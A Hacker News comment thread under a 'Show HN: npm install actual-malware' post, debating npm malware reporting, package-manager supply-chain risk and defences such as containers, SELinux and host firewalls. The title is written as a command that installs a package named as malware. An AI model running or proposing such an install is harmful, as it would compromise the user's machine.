Show HN: npm install actual-malware

This is a clever way to raise important issues in security of package managers, but I can't find support for your claim that NPM doesn't let you report malware. A cursory google search brought me this: https://docs.npmjs.com/reporting-malware-in-an-npm-package

And I confirmed that that button is indeed available on packages with a link that goes to eg https://www.npmjs.com/support?inquire=security&security-inqu...

What functionality was removed?

Yep I've been trying to get our company to pay more attention to it. It's not just nodejs. All the new hipster languages pull in whatever they can grab. Python, golang, Ruby..

A lot of this stuff is submitted by random people that have no verified credibility. It's really worrying. I'm sure it'll take another major incident though before we'll really pay attention to it. Like wanna cry/notpetya did for SMBv1. Because the devs don't want any mitigations, it'll make their work more difficult.

> Put passphrases on all your private keys. If you're a package maintainer then stay logged-out of your accounts on npm, github, etc, at least in the CLI.

Doesn't help when burglar is already in your house.

I get npm, but is it that realistic that yum will pull down a virus? If yum could be infected, then you are either pulling down obscure packages or using a 3rd party repository. If a mainstream package could get infected, it’s just as likely to end up in the base image that you started with (ISO, docker container, etc).

This is why it's important to use containers for development - or at least SELinux on your development host machine.

Simply restrict file access of npm to its cache folders, so it cannot access your other user configuration files.

Use additionally a host firewall like opensnitch to block npm from any other host than npmjs.com.

> Can't this be detected? Not really.

Contrary to OP belief, there are tools that claim to detect such malicious packages. I wonder how effective they are.